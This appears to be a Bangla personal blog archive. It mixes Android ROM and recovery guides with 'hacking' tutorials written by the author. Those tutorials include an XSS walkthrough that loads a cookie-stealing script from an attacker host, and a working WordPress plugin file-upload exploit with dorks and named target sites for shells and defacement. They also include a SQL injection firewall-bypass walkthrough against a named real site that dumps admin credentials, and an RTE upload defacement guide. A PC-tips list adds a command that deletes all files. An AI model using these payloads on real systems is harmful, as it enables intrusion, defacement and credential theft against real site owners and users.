10. এবার Root, Backup, Recovery tab এ যান এবং Recovery and Boot এ ক্লিক করুন ।
Tuesday, October 20, 2015
How To Install CWM on MTK android deviece
10. এবার Root, Backup, Recovery tab এ যান এবং Recovery and Boot এ ক্লিক করুন ।
Friday, September 4, 2015
Custom ROM for Celluler A102 by The Rysul (mt6572)
- New Boot Logo
- Latest Google playservice
- Problem solved play-service update problem ( login Clash of Clans)
- Android KitKat 4.4.2
- Status bar customizer
- Xperia Walkman added
- Usb OTG supported
- and many more tweaks... :p
BUG:
**Only one Bug : Front Camera does not work. I tried so much but couldn't solve it. If anyone can solve this please let me know..
Note: Backup your IMEI before installing
Download The ROM
Tuesday, September 1, 2015
এন্ড্রইডের বুট লোগো চেঞ্জ করুন CWM দিয়ে ( How to change Boot logo Android ( Bangla )
- প্রথমে এখান থেকে zip ফাইল টা Download করে নিন ।
- এবার update.zip ফাইলটা আপনার ফোনের SD card এ রাখুন (root direction)
- এবার আপনার ফোনটি CWM recovery mood এ অন করুন । (power+volume down)
- যদি আপনার ফোনে CWM না থাকে তবে www.forum.xda-developers.com থেকে দেখে নিন কিভাবে CWM install করতে হয় । অথবা আমার পরের পোস্টের জন্য অপেক্ষা করুন ।
- এবার CWM থেকে install zip from SD সিলেক্ট করুন ।
- এবার install update.zip সিলেক্ট করুন ।
- কাজ শেষ । এবার ফোন restart দিন আর আপনার নতুন বুট লোগো দেখুন কাজ করছে ।
Sunday, August 30, 2015
Android Rom Porting (রম পোর্ট করার প্রোসেস)
How to port ROM for MTK device
কম্পিউটার
আপনার ফোনের স্টক রম (Stock Rom)
যে রমটা পোর্ট করবেন (Custom Rom)
যেহেতু আমি windows 7 ব্যাবহার করছি তাই আমার ডিফাউল্ট এই 7-zip আছে । আপনি চাইলে winRAR, winZIP ইত্যাদি ব্যাবহার করতে পারেন ।
Notepad++
ধৈর্য আর সামান্য চিন্তা করার ক্ষমতা
আপনার স্টক রম আর কাস্টম দুটাই extract করুন । দুইটা আলাদা আলাদা ফল্ডারে রাখবেন ।
extract করতে zip ফল্ডারটির উপর রাইট ক্লিক করে 7-zip> extract to ........ select করুন ।
আপনার স্টক রম এর ফল্ডারে নিচের জিনিশ গুলো পাবেন । যদি সব ঠিক থাকে তবে পরের স্টেপ এ যান ।
META-INF
system
boot.img
(এর বেশি কিছু থাকলে চিন্তার কিছু নেই । দেখেন এই ৩ টা ফাইল আছে কি না ।)
স্টক রমের system/bin ফল্ডার কপি করে কাস্টম রমের system/ ফল্ডারে পেষ্ট করুন । copy and replace দিন । (systen/bin বলতে সিস্টেমের ভিতরে বিন নামের ফোল্ডার)
স্টক রমের system/lib ফল্ডার থেকে নিচের ফাইল গুলো কপি করে কাস্টম রমের system/lib ফল্ডারে পেষ্ট করুন । copy and replace দিন ।
libcamdrv.so
libcameracustom.so
libdpframework.so
libsensorservice.so
libsync.so
libvcodecdrv.so
স্টক রমের system/etc ফল্ডার থেকে নিচের ফাইল গুলো কপি করে কাস্টম রমের system/etc ফল্ডারে পেষ্ট করুন । copy and replace দিন ।
vold.fstab
vold.fstab.nand
এবার কাস্টম রম থেকে নিচের ফোল্ডার গুলো ডিলিট করে দিন এবং স্টক রম থেকে ফোল্ডার গুল কপি করে যথাস্থানে পেস্ট করুন ।
system/usr
system/lib/hw
system/lib/modules
system/lib/drm
system/etc/wifi
system/etc/bluetooth
system/etc/firmware
system/etc/permission
system/etc/security
system/lisystem/lib/soundfx
এবার মেইন ফোল্ডারে ফিরে গিয়ে stock rom এর boot.img ফাইল টা কপি করে Custom rom এ পেষ্ট করুন ।
শেষ ধাপে এবার নিচের ডিরেকশন অনুযায়ি ফাইলটি notepad++ দিয়ে অপেন করুন । আর দেখানো পদ্ধতিতে ইডিট করুন ।
mount(". ... . .. ... ... . . . .. . . ... . . "/system");
mount(". ... . .. ... ... . . . .. . . ... . . "/data");
এবার কাজ শেষ । এই ৩ টা একবারে সিলেক্ট করে 7-zip>add to filename.zip এ ক্লিক করুন ।
Saturday, February 14, 2015
XSS Hacking Tutorial (Bangla)
XSS হ্যাকিং টিউটোরিয়াল
--- Th3 Ry5u1
XSS কি ?
XSS হ্যাকিং সম্পর্কে জানতে হলে প্রথমেই জানতে হবে XSS জিনিসটা কি? Cross site Scripting এর সংক্ষিপ্তরূপই হচ্ছে XSS এটাকে আবার CSS(Cascading Style sheet) ও বলে থাকে। যার যেভাবে ইচ্ছা সে ভাবে বলে। এটা Web Application Vulnerability এর সবচেয়ে জনপ্রিয় গুলোর একটি। এই vulnerability একজন হ্যাকারকে একটি সাইটে client side scripts (বিশেষ কিছু Javascript) ইনসার্ট করার অনুমতি প্রদান করেন । এই vulnerabilityদিয়ে একজন হ্যাকার ভিকটিমের সাইটে malicious codes, malware attack, phishing ইত্যাদি inject করাতে পারে।
XSS Vulnerability and Injection
·ধাপ ১: Vulnerable ওয়েব সাইট খুঁজে বের করা
একজন হ্যাকার প্রথমে Vulnerable সাইট খুজে বের করেন। এজন্য সে প্রথমে Google এ যায় । তারপর সে Google Dorks ব্যবহার করে Vulnerable সাইট খুজে বের করে । তাহলে আপনি তার সাথে সার্চ দিন নিচের Google Dorks দিয়ে ।
"search?q="
তাহলে আপনি অনেকগুলো Vulnerable সাইট খুজে পাবেন। এবার একটি সাইটে প্রবেশ করুন
·ধাপ ২: Vulnerability পরীক্ষা করা
এখন আমরা যে সাইটে প্রবেশ করেছি, সেই সাইটের Vulnerability পরীক্ষা করে দেখব। এজন্য আপনাকে প্রথমে উক্ত সাইটের এবটি পোষ্ট বা parameter খুঁজে বের করতে হবে। বুঝেছেন? না বুঝলে একটু অপেক্ষা করেন, বলছি। মানে আপনি এমন একটি পোষ্ট খুঁজে বের করবেন যা উক্ত সাইটের সার্ভার পাঠাবে। যেমনঃ search query, username, password.
Vulnerability পরীক্ষা করা জন্য দুটি পদ্ধতি আছে।
পদ্ধতি ১: প্রথম পদ্ধতি হল সাইটের মূল সার্চ বক্সে injection করা।
একজন হ্যাকার সাধারণত সাইটের মূল সার্চ বক্সে একটি malcious script লিখে, তারপর সার্চ বাটনে ক্লিক করে। সার্চ দেয়ার সাথে সাথে malcious script টি ওয়েবসাইটে কাজ করা শুরু করে দেয়।
পদ্ধতি ২: সাইটের URL এ injection করা ।
এটি কোন সার্চ বক্সে কাজ করে না । এটি শুধু মাত্র সাইটের URL এ কাজ করে থাকে । যেমনঃ-
http://vulnerablewebsite/search?q=malicious_script_goes_here
পরীক্ষা করার সুবিধার্থে input fields হিসেবে নিচের কোডটি দিন।
<script>alert('hi');</script>
এবার উপরের কোডটি দিয়ে আপনি এবার পরীক্ষা করে দেখুন। যেমনঃ-
প্রথম পদ্ধতিঃ আপনি উপরের কোডটি আপনার ভিকটিমের সাইটের মূল সার্চ বক্সে লিখে সার্চ দেন।
দ্বিতীয় পদ্ধতিঃ আপনি ভিকটিমের সাইটের লিংকে লাগিয়ে এন্টার দিন। যেমনঃ-
http://vulnerablewebsite/search?q=<script>alert('Hi');</script>
এবার যদি ‘HI’ লিখা একটি পপ আপ বক্স আসে। তাহলে বুঝবেন যে এই সাইটটি XSS এর জন্য vulnerable.
·ধাপ ৩: Malicious Scripts দেয়া
Vulnerability পরীক্ষা করার পর একজন হ্যাকারের পরবর্তী কাজ হল, ভিকটিমের সাইটে malicious scripts ইঞ্জেকট করানো। এটি উক্তি সাইটের cookies চুরি করা এবং malware attack করতে সহযোগিতা করবে।
এখন মনে করুন হ্যাকারের সাইটে cookie stealing script টি আছে। তাহলে তার malicious script url হবে
http://attackerSite/malicious.js
·এখন হ্যাকার তার malcious script টি vulnerable site এ inject করতে পারবেন । তাহলে তার URL হবে
<script src=http://attackerSite/malicious.js></script>
এরপর যখনই উক্ত সাইটের ভিজিটর উক্ত সাইটে ভিজিট করবে, তখনি malcious script টি কাজ শুরু করে দিবে এবং কুকি চুরি করা শুরু করে দিবে।
সাধারণত XSS এর ক্ষমতা অনুসারে persisting capability হয় দুই ধরনের। একটা হল Persistent আরেকটা হল Non-Persistent
Persistent XSS:
এটা হল সবচেয়ে বেশি ঝুঁকিপূর্ণ XSS vulnerability. এটা সরাসরি সার্ভার থেকেই ডাটা সমূহ সংরক্ষণ করে থাকে। তাই আপনি যখনই উক্ত সাইটে malicious script injection দিবেন, সাথে সাথে এটি ওয়েব এ্যাপ্লিকেশানে স্থায়ীভাবে সংরক্ষণ হয়ে যাবে। এটি অন্যন্যা সকল ভিজিটরকে এটা দেখিয়ে দিবে। যদি আপনি আপনার ভিকটিমের ওয়েব সাইটে malicious script injection করবেন, তাহলে এটি উক্ত সাইটে আসা ভিজিটরদেরও আক্রান্ত করে। যেমনঃ- কিছু কিছু সাইট আছে, যারা তাদের সাইটের ব্যবহারকারিদের ট্যাক করার জন্য search query গুলো সংরক্ষণ করে রাখে। যার ফলাফল XSS এর permanent storage. icon smile XSS এর সম্পূর্ণ টিউটোরিয়াল (নতুনদের জন্য) পর্ব ৫
Non-Persistent XSS:
একে অনেকেই Reflected XSS বলে থাকে। এজন্যই malicious script এখানে টেম্পরারী। ফলে আপনার দেয়া স্ক্রীপ্টটি সাধারণ ভিজিটররা দেখতে পারবে না। তবে হ্যাঁ, যারা হ্যাকার তারা তাদের দেয়া স্ক্রীপ্টটি ভিজিটরদের দেখানোর জন্য injection টিপস ব্যবহার করে থাকে। মজার বিষয় হল, যারা উক্ত সাইটের যারা নিয়মিত ভিজিটর তারা কিন্তু মনে করে যে এটা সাইটের নিজের লিংক। ফলে তারা সেখানে যায় আর তারও উক্ত সাইটের হ্যাকিংয়ের শিকার হয়। যেমনঃ- আপনি কিছু কিছু সাইটে যে কোন জিনিস সার্চ দিলে দেখবেন আপনাদের আপনার দেয়া সার্চ স্ট্রিংটি আপনাকে পুনরায় দেখাচ্ছে। এটার কারণেই malicious code temporarily .
একজন হ্যাকার এই Vulnerability দিয়ে কি করে ?
পরিচয়পত্র ও বিভিন্ন গোপনীয় তথ্য চুরি করা।
ওয়েব সাই্টের Bypassing restriction
Session Hijacking
Malware Attack
Website Defacement
Dos attacks
আশা করি সবাই XSS এর বিষয়ে মোটামুটি ভাবে বুঝতে পেরেছেন। আরও কিছু টিউটোরিয়াল সামনে পাবেন। তখন আরও পরিষ্কার ভাবে শিখতে পারবেন XSS এর সম্পর্কে।
Hack With exploit (easiest)
Hacking with Exploit
---Th3 Ry5u1
Google dork: inurl:wp-content/plugins/awesome-support
# Exploit
<html>
<body>
<form action="http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php" method="post"
enctype="multipart/form-data">
Filename:<input type="file" name="qqfile" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
এই এক্সপ্লইট কোডটা দিয়ে আপনি একটি example.html page তৈরি করবেন । তারপর আপনার পেইজ টা অপেন্দ করে আপনার ডিফেস পেইজ অথবা যেকোনো সেল upload করতে পারবেন ।
# এখানে খেয়াল করবেন এক্সপ্লইট এর ভিতরে [target] আচে এটা আপনি ডর্ক দিয়ে পাওয়া যেকন সাইট দিয়ে পরিবর্তন করে নিবেন ।
Deface/Shell path: http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/
Demo sites
http://buzness.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
http://themespixel.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
http://www.comproporvos.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
SQL injection Firewall bypass (bangla)
এস্কিউয়াল ইঞ্জেকশন ফায়ারওয়াল বাইপাস
--Th3 Ry5ul
সাধারনত অনেক এস্কিউয়াল ভুলনারেবল সাইট এ order by statement দিয়ে ভুলনারেবল কলাম নাম্বার পেলেও union select,union all select এসব কমান্ড দিয়ে স্ট্রিং কলাম বের করা সম্ভব হয়না :( কি আর করার! তখন আমরা WAF(Web Application Firewall) bypass করি :D
·ফায়ারওয়াল বাইপাস এর সাধারন কিউরি গুলো হল =>
১। http://www.site.com/index.php?id=-1 /*!union*/ /*!select*/ 1,2,3,4,version(),6,7,8,9--
২। http://www.site.com/index.php?id=-1 UNIunionON SELselectECT 1,2,3,4,version(),6,7,8,9--
৩। http://www.site.com/index.php?id=-1 un*ion sel*ect 1,2,3,4,version(),6,7,8,9--
আরও থাকতে পারে :P আমার জানা নাই :P
তবে জিঙ্ক কোড দিয়ে ফায়ারওয়াল বাইপাস করা কার্যকরী জিঙ্ক কোড তেমন কিছু না । ভয় পাবেন না :P
50000 হল জিঙ্ক কোড :D
·অনেক সাইটে union select statement দিয়ে লেখা আসে =>
Not Acceptable ! An appropriate representation of the requested resource could not be found on this server. This error was generated by Mod_Security.
·আবার অনেক সময় এটা আসেঃ
Forbidden
You don't have permission to access /content.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
[এক্সঃ http://www.wdesignstudio.in/article.php?id=-10'+UNION+SELECT+1,2,3--+ ]
·এটা বাইপাস করতে আমরা জিঙ্ক কোড ব্যাবহার করব :D জিঙ্ক কোড =>
http://www.site.com/index.php?id=-1+/*!50000UNION*/+/*!50000SELECT*/+1,2,3,4,5,6,7,8,9--
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,2,3--+ ]
২ নাম্বার স্ট্রিং কলাম পেয়েছি :D (এক্সাঃ অনুযায়ী)
·ভারশন বের করতে শুধু ১৭ এর বদলে version() অথবা @@version লিখলে ই হবে ;)
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,@@version,3--+ ]
দেখুন ভারশন হলঃ 5.5.33-31.1 (এক্সাঃ অনুযায়ী)
·এভাবে টেবিল বের করতে group_concat(table_name) এর জায়গায় unhex(hex(/*!50000concat*/(table_name))) বদলে দিতে হবে আর শেষে from information_schema.tables where table_schema=database()-- এর জায়গাতে /*!50000from*/+information_schema./**/+tables+where+table_schema=database()-- হবে
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()--+ ]
[নোটঃ অনেক সময় এটা না হলে unhex(hex(/*!50000concat*/(table_name))) এর জায়গায় /*!50000concat*/(table_name) বসিয়ে দেখতে পারেন তাও না হলে unhex(hex(/*12345concat*/(table_name))) এটা দেখেন -_- আর জদি তাও না হয় >_< সাইট রে গুল্লি মারেন (আমি পারিনা :P)]
·BANNERS টেবিল পেয়েছি ! কিন্তু ফায়ারওয়াল বাইপাস এর সমস্যা ১টাই টেবিল আর কলাম সবগুলা ১সাথে আশে নাহ :( আলাদা করে বের করতে হয় এজন্য শেষে limit 1,1 তারপর limit 2,1 একইভাবে limit 3,1 এভাবে বসিয়ে টেবিল / কলাম আলাদা ভাবে বের করতে হয় ! আমরা এখন শেষে limit 1,1 বসাব!
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()+limit+1,1--+ ]
·আমরা esh_pages টেবিল পেয়েছি :D এভাবে লিমিত বারাতে থাকেন দেখেন limit 7,1 এ users table :v :v
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(table_name))),3+/*!50000from*/+information_schema./**/+tables+where+table_schema=database()+limit+7,1--+ ]
·এখন users এর হেক্স অথবা char দিয়া কলাম বের করব! কলাম বের করতে table_name এর জায়গায় column_name ; tables+where এর জাগায় columns+where আর table_schema এর জায়গায় table_name :P
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3+/*!50000from*/+information_schema./**/+columns+where+table_name=0x7573657273--+ ]
·ID আসছে এবার limit 1,1 দিয়া দেখেন !! টেবিল জেভাবে বের করছিলেন অইরকম!
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3+/*!50000from*/+information_schema./**/+columns+where+table_name=0x7573657273+limit+1,1--+ ]
· limit 1,1 দিয়া NAME কলাম পাইসেন :D এবার limit 2,1 দিয়া দেখি :D
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(column_name))),3+/*!50000from*/+information_schema./**/+columns+where+table_name=0x7573657273+limit+2,1--+ ]
·PASSWORD কলাম পাইছি :D এবার আমরা column থেকে data বের করব! এজন্য শেষে
/*!50000from*/+users হবে [নোটঃ কারন টেবিল এর নাম users] এবং (column_name)এর জায়গায় (name,0x3a,password) হবে :D :D দেখি তো :P
[এক্সাঃ http://www.wdesignstudio.in/article.php?id=-10'+/*!50000UNION*/+/*!50000SELECT*/+1,unhex(hex(/*!50000concat*/(name,0x3a,password))),3+/*!50000from*/+users--+ ]
·পারসি :D :D (ইয়)
admin: admin
password: 5f4dcc3b5aa765d61d8327deb882cf99
Friday, February 13, 2015
How to use Google Dork
Wednesday, February 11, 2015
10 Important Tips For PC
1- View full specifications of your PC:
Just go to Run
type "dxdiag"
press enter.
... Then you can view all PC specifications.
2- Delete all files of a Hard Disc when run a
simple file:
>Notepad >Type DEL/F/Q*>Save it as delete
command
3- Boost Ur PC
>Right click My Computer>Proprties
>Advancd>Performnce >Advancd>Virtual
Memory >Change
Keep Initial Size
Same & Max Size Double
4- Increase your Web Browser loading
speed & save Time by 65%(both pc & mobi)
:
1) CLEAR CACHE MEMORY at every 10 min.
2) Set OFF IMAGES if no need!
5- Make ur own font in XP:
Private charecter editor used for editing
fonts.
- run
- Type "eudcedit"
- Try making new fonts.
6- Trick 2 increase PC life:
-Shut down proprly
-Dont place many icons in desktop
-Keep 50% free spce in C drive
-Dont keep foldrs in task bar.
7- Who used ur PC in ur Absence?
What did he do?
1st u shud Go-
>start
>run
>Type- eventvwr.msc
8- U can explore the whole world online
now like google earth without any softwre.
Go
www.wikimapia.org
&
see your home, roof & garden on your pc.
9- Want to Block Unwanted Website on
firefox:
Download this addon:
https://addons.mozilla.o/rg/en-US/ firefox/
addon/ 4351
after it
block any site.
10- How to add password to files & folders
on computer?
>Right click >new>Compressedfolder >paste
file in to folder >Right click add password
RTE HACKING TUTORIAL
RTE হ্যাকিং টিউটোরিয়াল
--- Th3 Ry5u1
প্রথমে Google.com এ যান ।
এবার নিচের যে কোন একটি ডক
দিয়ে সার্চ দিন ।
inurl:rte/my_documents/my_files
inurl:/my_documents/my_files/
inurl:RTE_popup_file_atch.asp
তাহলে গুগল
আপনাকে অনেকগুলো ফলাফল
দিবে । যে ফলাফলগুলো দেখাবে,
সেগুলো দেখতে এমন হবে
site.com/rte/RTE_popup_file_atch.asp
site.com/admin/RTE_popup_file_atch.asp
এখন ধরুন আমরা এই
ওয়েবসাইটটি পেয়েছি ।
http://www.billkonigsberg.com
তাহলে এর Vulnerability হবে
http://www.billkonigsberg.com/RTE_popup_
file_atch.asp
এবার সাইটটিতে প্রবেশ করুন ।
একটি পেইজ আসবে যাতে দেখবেন
upload দেওয়ার option আছে ।
এবার Browes বাটনে ক্লিক
করে আপনার html defacepage
আপলোড করুন । এবার Upload
বাটনে ক্লিক করুন ।
আপনার আপলোড শেষ
হলে বামপাশে আপনার আপলোড
করা ফাইলগুলো দেখাবে । আপনার
আপলোড করার পর আপনার
পেজটি হবে (এখানে FC5_index.htm
এটা হল আমার আপলোড করা ফাইল) ।
http://www.billkonigsberg.com/my_
documents/my_files/Th3_Ry5u1.htm
শুধু HTML নয় আপনি asp বা jpg shell
আপলোড করতে পারবেন ।
http://www.billkonigsberg.com/my_
documents/my_files/আপনার_ডিফেস_
পেইজের_নাম.htm এটাই হবে আপনার
হ্যাক করা site এর লিঙ্ক ।
আপনি মিরর এ এই লিঙ্কটা সাবমিট
দিবেন ।